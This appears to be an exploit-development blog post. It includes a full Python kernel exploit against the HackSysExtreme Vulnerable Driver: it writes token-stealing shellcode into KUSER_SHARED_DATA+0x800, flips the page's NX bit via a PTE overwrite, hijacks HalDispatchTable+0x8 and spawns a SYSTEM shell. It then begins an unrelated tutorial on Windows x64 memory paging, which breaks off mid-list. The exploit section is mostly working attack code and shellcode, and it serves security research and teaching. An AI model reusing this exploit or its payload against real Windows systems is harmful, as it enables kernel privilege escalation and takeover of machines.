Did you think I forgot about you, kernel no-execute (NX)?

Let’s say that for some reason, you are against the method of allocating user mode code. There are many reasons for that, one of them being EDR hooking of crucial functions like VirtualAlloc().

Let’s say you want to take advantage of various defensive tools and their lack of visibility into kernel mode. How can we leverage already existing kernel mode memory in the same manner?

Okay, This Time We Are Going To The Mountain! KUSER_SHARED_DATA Time!

Morten in his research suggests that another suitable method may be to utilize the KUSER_SHARED_DATA structure in the kernel directly, similarly to how ROP works in user mode.

The concept of ROP in user mode is the idea that we have the ability to write shellcode to the stack, we just don’t have the ability to execute it. Using ROP, we can change the permissions of the stack to that of executable, and execute our shellcode from there.

The concept here is no different. We can write our shellcode to KUSER_SHARED_DATA+0x800, because it is a kernel mode page with writeable permissions.

Using our write and read primitives, we can then flip the NX bit (similar to ROP in user mode) and make the kernel mode memory executable!

The question still remains, why KUSER_SHARED_DATA?

Static Electricity

Windows has slowly but surely dried up all of the static addresses used by exploit developers over the years. One of the last things many people relied on for kASLR bypasses was the lack of randomization of the HAL heap. The HAL heap used to contain a pointer to the kernel AND be static, but it is no longer static.

Although everything is dynamically based, there is still a structure that remains which is static, KUSER_SHARED_DATA.

This structure, according to Geoff Chappell, is used to define the layout of data that the kernel shares with user mode.

The issue is, this structure is static at the address 0xFFFFF78000000000!

What is even more interesting, is that KUSER_SHARED_DATA+0x800 seems to just be a code cave of non-executable kernel mode memory which is writeable!

How Do We Leverage This?

Our arbitrary write primitive only allows us to write one QWORD of data at a time (8 bytes). My thought process here is to:

  1. Break up the 67 byte shellcode into 8 byte pieces and pad the final piece with NULL bytes.
  2. Write each line of shellcode to KUSER_SHARED_DATA+0x800, KUSER_SHARED_DATA+0x808, KUSER_SHARED_DATA+0x810, etc.
  3. Use the same read primitive to bypass page table randomization and obtain PTE control bits of KUSER_SHARED_DATA+0x800.
  4. Make KUSER_SHARED_DATA+0x800 executable by overwriting the PTE.
  5. NT AUTHORITY\SYSTEM
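Steps 1 and 2 above can be sketched in a few lines instead of doing the split by hand. The helper name and the writes list are my own, and I am assuming the shellcode is the same 67 byte token stealing payload from the first exploit. Each resulting QWORD is what would be stored in a c_ulonglong() and handed to the write primitive.

```python
import struct

def split_into_qwords(shellcode):
    # Pad with NULL bytes to a multiple of 8, then unpack little-endian QWORDs
    padding = (-len(shellcode)) % 8
    padded = bytes(shellcode) + b"\x00" * padding
    return list(struct.unpack("<%dQ" % (len(padded) // 8), padded))

# Token stealing payload (assumed to match the first exploit in this post)
payload = (
    b"\x65\x48\x8B\x04\x25\x88\x01\x00\x00"
    b"\x48\x8B\x80\xB8\x00\x00\x00"
    b"\x48\x89\xC3"
    b"\x48\x8B\x9B\xF0\x02\x00\x00"
    b"\x48\x81\xEB\xF0\x02\x00\x00"
    b"\x48\x8B\x8B\xE8\x02\x00\x00"
    b"\x48\x83\xF9\x04"
    b"\x75\xE5"
    b"\x48\x8B\x8B\x58\x03\x00\x00"
    b"\x80\xE1\xF0"
    b"\x48\x89\x88\x58\x03\x00\x00"
    b"\x48\x31\xC0"
    b"\xC3"
)

KUSER_SHARED_DATA = 0xFFFFF78000000000

chunks = split_into_qwords(payload)

# (destination address, QWORD) pairs, one per arbitrary write
writes = [(KUSER_SHARED_DATA + 0x800 + 8 * i, qword)
          for i, qword in enumerate(chunks)]
```

The first QWORD lines up with the first_shellcode value used further down, and the last one is padded out with NULL bytes after the ret.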

Before we begin, the steps about obtaining the contents of nt!MiGetPteAddress+0x13 and extracting the PTE control bits will be left out in this portion of the blog, as they have already been explained in the beginning of this post!

Moving on, let’s start with each line of shellcode.

For each line written the data type chosen was that of a c_ulonglong() - as it was easy to store into a c_void_p.

The first line of shellcode had an associated structure as shown below.

class WriteWhatWhere_Shellcode_1(Structure):
    _fields_ = [
        ("What_Shellcode_1", c_void_p),
        ("Where_Shellcode_1", c_void_p)
    ]

Shellcode is declared as a c_ulonglong().

# Using just long long integer, because only writing opcodes.
first_shellcode = c_ulonglong(0x00018825048B4865)

The shellcode is then written to KUSER_SHARED_DATA+0x800 through the previously created structure.

www_shellcode_one = WriteWhatWhere_Shellcode_1()
www_shellcode_one.What_Shellcode_1 = addressof(first_shellcode)
www_shellcode_one.Where_Shellcode_1 = KUSER_SHARED_DATA + 0x800
www_shellcode_one_pointer = pointer(www_shellcode_one)

This same process was repeated 9 times, until all of the shellcode was written.

As you can see in the image below, the shellcode was successfully written to KUSER_SHARED_DATA+0x800 due to the writeable PTE control bit of this structure.

Executable, Please!

Using the same arbitrary read primitives as earlier, we can extract the PTE control bits of KUSER_SHARED_DATA+0x800’s memory page. This time, however, instead of subtracting 4 - we are going to use bitwise AND per Morten’s research.

# Setting KUSER_SHARED_DATA + 0x800 to executable
pte_control_bits_execute = pte_control_bits_no_execute & 0x0FFFFFFFFFFFFFFF

We can see that dynamically, we can set KUSER_SHARED_DATA+0x800 to executable memory, giving us a nice big executable kernel memory region!
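The no-execute (NX) bit is bit 63 of the PTE, so the 0x0FFFFFFFFFFFFFFF mask clears it along with bits 60 through 62. If you only want to touch NX, a narrower mask does the job. This is a sketch with made-up names, and the PTE value below is hypothetical and only there for illustration.

```python
PTE_NX_BIT = 1 << 63   # no-execute bit of an x64 PTE

def make_executable(pte_value):
    # Hypothetical helper: clear only the NX bit, leave everything else alone
    return pte_value & ~PTE_NX_BIT

# Hypothetical non-executable kernel mode PTE value, for illustration only
pte_no_execute = 0x8000000000963863

pte_execute = make_executable(pte_no_execute)

# Both masks agree whenever bits 60 through 62 are already clear
matches_post_mask = (pte_execute == (pte_no_execute & 0x0FFFFFFFFFFFFFFF))
```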

All that is left to do now, is overwrite the nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 and nt!KeQueryIntervalProfile() will take care of the rest!

This exploit can also be found on my GitHub, but here it is if you do not feel like heading over there:

# HackSysExtreme Vulnerable Driver Kernel Exploit (x64 Arbitrary Overwrite/SMEP Enabled)
# KUSER_SHARED_DATA + 0x800 overwrite
# Windows 10 RS1
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Defining KUSER_SHARED_DATA
KUSER_SHARED_DATA = 0xFFFFF78000000000

# First structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)
    ]

# Second structure, first 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_1(Structure):
    _fields_ = [
        ("What_Shellcode_1", c_void_p),
        ("Where_Shellcode_1", c_void_p)
    ]

# Third structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_2(Structure):
    _fields_ = [
        ("What_Shellcode_2", c_void_p),
        ("Where_Shellcode_2", c_void_p)
    ]

# Fourth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_3(Structure):
    _fields_ = [
        ("What_Shellcode_3", c_void_p),
        ("Where_Shellcode_3", c_void_p)
    ]

# Fifth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_4(Structure):
    _fields_ = [
        ("What_Shellcode_4", c_void_p),
        ("Where_Shellcode_4", c_void_p)
    ]

# Sixth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_5(Structure):
    _fields_ = [
        ("What_Shellcode_5", c_void_p),
        ("Where_Shellcode_5", c_void_p)
    ]

# Seventh structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_6(Structure):
    _fields_ = [
        ("What_Shellcode_6", c_void_p),
        ("Where_Shellcode_6", c_void_p)
    ]

# Eighth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_7(Structure):
    _fields_ = [
        ("What_Shellcode_7", c_void_p),
        ("Where_Shellcode_7", c_void_p)
    ]

# Ninth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_8(Structure):
    _fields_ = [
        ("What_Shellcode_8", c_void_p),
        ("Where_Shellcode_8", c_void_p)
    ]

# Tenth structure, last 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_9(Structure):
    _fields_ = [
        ("What_Shellcode_9", c_void_p),
        ("Where_Shellcode_9", c_void_p)
    ]


# Eleventh structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)
    ]

# Twelfth structure, to overwrite executable bit of KUSER_SHARED_DATA+0x800's PTE
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)
    ]

# Thirteenth structure, to overwrite HalDispatchTable + 0x8 with KUSER_SHARED_DATA + 0x800
class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

"""
Token stealing payload

\x65\x48\x8B\x04\x25\x88\x01\x00\x00              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
\x48\x8B\x80\xB8\x00\x00\x00                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
\x48\x89\xC3                                      # mov rbx,rax         ; Copy current process to rbx
\x48\x8B\x9B\xF0\x02\x00\x00                      # mov rbx,[rbx+0x2f0] ; ActiveProcessLinks
\x48\x81\xEB\xF0\x02\x00\x00                      # sub rbx,0x2f0       ; Go back to current process
\x48\x8B\x8B\xE8\x02\x00\x00                      # mov rcx,[rbx+0x2e8] ; UniqueProcessId (PID)
\x48\x83\xF9\x04                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
\x75\xE5                                          # jnz 0x13            ; Loop until SYSTEM PID is found
\x48\x8B\x8B\x58\x03\x00\x00                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
\x80\xE1\xF0                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
\x48\x89\x88\x58\x03\x00\x00                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
\x48\x31\xC0                                      # xor rax,rax         ; set NTSTATUS SUCCESS
\xC3                                              # ret                 ; Done!
"""

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails (EnumDeviceDrivers() returns 0 on failure)
if not get_drivers:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

# Print update for ntoskrnl.exe base address
print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Phase 1: Grab the base of the PTEs via nt!MiGetPteAddress

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x1b5f4

# Print update for nt!MiGetPteAddress address 
print "[+] nt!MiGetPteAddress is located at: {0}".format(hex(nt_mi_get_pte_address))

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

# Print update for nt!MiGetPteAddress+0x13 address
print "[+] nt!MiGetPteAddress+0x13 is located at: {0}".format(hex(pte_base))

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

# Getting handle to driver to return to DeviceIoControl() function
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                       # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of extracting value from a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

# Print update for PTE base
print "[+] Leaked base of PTEs!"
print "[+] Base of PTEs are located at: {0}".format(hex(base_of_ptes))

# Phase 2: Calculate KUSER_SHARED_DATA's PTE address

# Calculating the PTE for KUSER_SHARED_DATA + 0x800
kuser_shared_data_800_pte_address = KUSER_SHARED_DATA + 0x800 >> 9
kuser_shared_data_800_pte_address &= 0x7ffffffff8
kuser_shared_data_800_pte_address += base_of_ptes

# Print update for KUSER_SHARED_DATA + 0x800 PTE
print "[+] PTE for KUSER_SHARED_DATA + 0x800 is located at {0}".format(hex(kuser_shared_data_800_pte_address))

# Phase 3: Write shellcode to KUSER_SHARED_DATA + 0x800

# First 8 bytes

# Using just long long integer, because only writing opcodes.
first_shellcode = c_ulonglong(0x00018825048B4865)

# Write-what-where structure #2
www_shellcode_one = WriteWhatWhere_Shellcode_1()
www_shellcode_one.What_Shellcode_1 = addressof(first_shellcode)
www_shellcode_one.Where_Shellcode_1 = KUSER_SHARED_DATA + 0x800
www_shellcode_one_pointer = pointer(www_shellcode_one)

# Print update for shellcode
print "[+] Writing first 8 bytes of shellcode to KUSER_SHARED_DATA + 0x800..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_one_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
second_shellcode = c_ulonglong(0x000000B8808B4800)

# Write-what-where structure #3
www_shellcode_two = WriteWhatWhere_Shellcode_2()
www_shellcode_two.What_Shellcode_2 = addressof(second_shellcode)
www_shellcode_two.Where_Shellcode_2 = KUSER_SHARED_DATA + 0x808
www_shellcode_two_pointer = pointer(www_shellcode_two)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x808..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_two_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
third_shellcode = c_ulonglong(0x02F09B8B48C38948)

# Write-what-where structure #4
www_shellcode_three = WriteWhatWhere_Shellcode_3()
www_shellcode_three.What_Shellcode_3 = addressof(third_shellcode)
www_shellcode_three.Where_Shellcode_3 = KUSER_SHARED_DATA + 0x810
www_shellcode_three_pointer = pointer(www_shellcode_three)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x810..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_three_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
fourth_shellcode = c_ulonglong(0x0002F0EB81480000)

# Write-what-where structure #5
www_shellcode_four = WriteWhatWhere_Shellcode_4()
www_shellcode_four.What_Shellcode_4 = addressof(fourth_shellcode)
www_shellcode_four.Where_Shellcode_4 = KUSER_SHARED_DATA + 0x818
www_shellcode_four_pointer = pointer(www_shellcode_four)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x818..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_four_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
fifth_shellcode = c_ulonglong(0x000002E88B8B4800)

# Write-what-where structure #6
www_shellcode_five = WriteWhatWhere_Shellcode_5()
www_shellcode_five.What_Shellcode_5 = addressof(fifth_shellcode)
www_shellcode_five.Where_Shellcode_5 = KUSER_SHARED_DATA + 0x820
www_shellcode_five_pointer = pointer(www_shellcode_five)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x820..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_five_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
sixth_shellcode = c_ulonglong(0x8B48E57504F98348)

# Write-what-where structure #7
www_shellcode_six = WriteWhatWhere_Shellcode_6()
www_shellcode_six.What_Shellcode_6 = addressof(sixth_shellcode)
www_shellcode_six.Where_Shellcode_6 = KUSER_SHARED_DATA + 0x828
www_shellcode_six_pointer = pointer(www_shellcode_six)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x828..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_six_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
seventh_shellcode = c_ulonglong(0xF0E180000003588B)

# Write-what-where structure #8
www_shellcode_seven = WriteWhatWhere_Shellcode_7()
www_shellcode_seven.What_Shellcode_7 = addressof(seventh_shellcode)
www_shellcode_seven.Where_Shellcode_7 = KUSER_SHARED_DATA + 0x830
www_shellcode_seven_pointer = pointer(www_shellcode_seven)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x830..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_seven_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
eighth_shellcode = c_ulonglong(0x4800000358888948)

# Write-what-where structure #9
www_shellcode_eight = WriteWhatWhere_Shellcode_8()
www_shellcode_eight.What_Shellcode_8 = addressof(eighth_shellcode)
www_shellcode_eight.Where_Shellcode_8 = KUSER_SHARED_DATA + 0x838
www_shellcode_eight_pointer = pointer(www_shellcode_eight)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x838..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_eight_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Last 8 bytes
ninth_shellcode = c_ulonglong(0x0000000000C3C031)

# Write-what-where structure #10
www_shellcode_nine = WriteWhatWhere_Shellcode_9()
www_shellcode_nine.What_Shellcode_9 = addressof(ninth_shellcode)
www_shellcode_nine.Where_Shellcode_9 = KUSER_SHARED_DATA + 0x840
www_shellcode_nine_pointer = pointer(www_shellcode_nine)

# Print update for shellcode
print "[+] Writing last 8 bytes of shellcode to KUSER_SHARED_DATA + 0x840..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_nine_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Phase 3: Extract KUSER_SHARED_DATA + 0x800's PTE control bits

# Declaring C void pointer to store PTE control bits
pte_bits_pointer = c_void_p()

# Write-what-where structure #11
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = kuser_shared_data_800_pte_address
www_pte_bits.Where_PTE_Control_Bits = addressof(pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_bits_pointer,               # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of extracting value from a C void pointer
pte_control_bits_no_execute = struct.unpack('<Q', pte_bits_pointer)[0]

# Print update for PTE control bits
print "[+] PTE control bits for KUSER_SHARED_DATA + 0x800: {:016x}".format(pte_control_bits_no_execute)

# Phase 4: Clear the NX (no-execute) bit in the PTE for the shellcode page

# Setting KUSER_SHARED_DATA + 0x800 to executable
pte_control_bits_execute = pte_control_bits_no_execute & 0x0FFFFFFFFFFFFFFF

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #12 since a pointer to the PTE control bits is needed
pte_overwrite_pointer = c_void_p(pte_control_bits_execute)

# Write-what-where structure #12
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = kuser_shared_data_800_pte_address
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

# Print update for PTE overwrite
print "[+] Overwriting KUSER_SHARED_DATA + 0x800's PTE..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_overwrite_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Print update for PTE overwrite round 2
print "[+] KUSER_SHARED_DATA + 0x800 is now executable! See you later, SMEP!"

# Phase 5: Shellcode

# nt!HalDispatchTable address (Windows 10 RS1 offset)
haldispatchtable_base_address = kernel_address + 0x2f43b0

# nt!HalDispatchTable + 0x8 address
haldispatchtable = haldispatchtable_base_address + 0x8

# Print update for nt!HalDispatchTable + 0x8
print "[+] nt!HalDispatchTable + 0x8 is located at: {0}".format(hex(haldispatchtable))

# Declaring KUSER_SHARED_DATA + 0x800 address again as a c_ulonglong to satisfy c_void_p type from structure.
KUSER_SHARED_DATA_LONGLONG = c_ulonglong(0xFFFFF78000000800)

# Write-what-where structure #13
www = WriteWhatWhere()
www.What = addressof(KUSER_SHARED_DATA_LONGLONG)
www.Where = haldispatchtable
www_pointer = pointer(www)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pointer,                        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Actually calling NtQueryIntervalProfile function, which will call HalDispatchTable + 0x8, where the shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulonglong())
)

# Print update for shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!"
os.system("cmd.exe /K cd C:\\")

NT AUTHORITY\SYSTEM x 2!

Final Thoughts

I really enjoyed this method of SMEP bypass! I also loved circumventing SMEP altogether and bypassing NonPagedPoolNx via KUSER_SHARED_DATA+0x800 without the need for user mode memory!

I am always looking for new challenges and decided this would be a fun one!

If you would like to take a look at how SMEP can be bypassed via U/S bit corruption in C, here is this same exploit written in C (note - some offsets may be different).

As always, feel free to reach out to me with any questions, comments, or corrections! Until then!

Peace, love, and positivity! :-)

Turning the Pages: Introduction to Memory Paging on Windows 10 x64

26 April 2020 at 00:00

Introduction

0xFFFFFFFF11223344 is an example of a virtual memory address, and anyone who spends a lot of time inside of a debugger may be familiar with this notion. “Oh, that address is somewhere in memory and references X” may be an inference that is made about a virtual memory address. I always wondered where this address schema came from. It wasn’t until I started doing research into kernel mode mitigation bypasses that I realized learning where these virtual addresses originate from is a very important concept. This blog will by no means serve as a complete guide to virtual and physical memory in Windows, as it could EASILY be a multi series blog post. This blog is meant to serve as the prerequisite knowledge needed to do things like change permissions of a memory page in kernel mode with a vulnerability such as a write-what-where bug to bypass kernel mitigations such as SMEP or NonPagedPoolNx through page table entries.

Let’s dive into memory paging, and see where these virtual memory addresses originate from and what we can learn from these seemingly obscure 8 bytes we stumble across so often.

Firstly, before we begin, if you want a full fledged low level explanation of nearly every aspect of memory in Windows (which far surpasses the scope of this blog post) I HIGHLY suggest reading What Makes It Page?: The Windows 7 (x64) Virtual Memory Manager written by Enrico Martignetti. In addition to paging, we will look at some ways we can use WinDbg to automate some of the more admittedly cumbersome steps in the memory paging process.

Paging? ELI5?

Memory paging refers to the implementation of virtual memory by the MMU (memory management unit). Virtual memory is mapped to physical memory, known as RAM (and in some cases, actually to disk temporarily if physical memory needs to be optimized elsewhere).

One of the main reasons that memory paging is generally enabled, is the concept of “resource sharing”. For example, if we have two instances of the calc.exe - these two instances can share physical memory. Sharing physical memory is very important, as RAM is an expensive resource.

Take a look at the below image, from the Windows Internals, Part 1 (Developer Reference) 7th Edition book to get a better understanding visually of virtual to physical memory mapping.

In addition to this information, it is important to note that a physical memory page is generally 4 KB in size on x64 Windows (2 MB and even 1 GB pages can be used, but that is beyond the scope of this blog). We will see how this comes to fruition in upcoming sections of this post.

Before diving straight in to some of the lower level details, it is important to note there are a few different “paging modes” that can be utilized. Paging modes refer to the way paging is executed. The paging mode we will be referring to and using (as is default on basically every x64 version of Windows) is Long-Mode Paging.

Are We There Yet?

If we want to understand WHAT paging actually does, let’s take a moment to analyze how paging is actually enabled! Looking at some of the control registers will show us if/how paging is enabled and what paging mode we are using.

According to the Intel 64 and IA-32 Architectures Software Developer’s Manual, the CR0 register is responsible for paging being enabled.

CR0.PG refers to bit 31 of the CR0 register (counting from bit 0). If this bit is set to 1, paging is enabled. If it is set to 0, paging is disabled.

The above image is from a default installation of Windows 10 x64, showing bit 31 of the CR0 register is set to 1.

We now know that paging is enabled based on the image above - but what kind of paging are we using? Referring again to the Intel manual, we notice that the CR4 control register is responsible for implementing the paging mode we are using.

As mentioned previously, the paging mode we are using is called Long-Mode Paging. Long-Mode Paging requires Physical Address Extension, or PAE, to be enabled. PAE is a prerequisite for 64-bit paging. If PAE was disabled, only 32-bit paging would be possible.

Bit 5 of the CR4 register (CR4.PAE, counting from bit 0) is responsible for PAE being enabled. 1 = enabled, 0 = disabled.

We can also see, on a default installation of Windows 10 x64, PAE is enabled by default.
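If you would rather check these two bits with a few lines of code than by eye, here is a minimal sketch. The register values below are hypothetical examples of what a kernel debugger might display, not values taken from the images in this post, and the helper name bit_is_set is made up for illustration.

```python
CR0_PG = 1 << 31    # CR0.PG: paging enabled
CR4_PAE = 1 << 5    # CR4.PAE: physical address extension enabled

def bit_is_set(register_value, mask):
    """Return True if the bit selected by mask is set in register_value."""
    return (register_value & mask) != 0

# Hypothetical register values, for illustration only
cr0 = 0x80050033
cr4 = 0x001506F8

print("CR0.PG  set: {}".format(bit_is_set(cr0, CR0_PG)))
print("CR4.PAE set: {}".format(bit_is_set(cr4, CR4_PAE)))
```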

Now that we know how to identify IF and WHAT KIND of paging is enabled, let’s get into virtual to physical address translation!

Let’s Get Physical!

The easiest way to think about a virtual memory address, and where it comes from, is to look at it from a different perspective. Don’t take it at face value. Understanding what the virtual address is trying to accomplish, will surely shed some light on this whole process.

A virtual address is simply a set of indexes into several paging structures, which are used to fetch the physical page that corresponds to a virtual page.

Take a look at the image below, taken from the AMD64 Architecture Programmer’s Manual Volume 2.

Although this image above looks very intimidating, let’s break it down.

As we can see, the virtual address in this case is a 64-bit virtual address. The first portion of the address, bits 63-48, are represented as “Sign Extend”. Let’s leave this on the back burner for the time being.

We can see there are four paging structures in use:

  1. Page-Map Level-4 Table (PML4) (Bits 47-39)
  2. Page-Directory-Pointer Table (PDPT) (Bits 38-30)
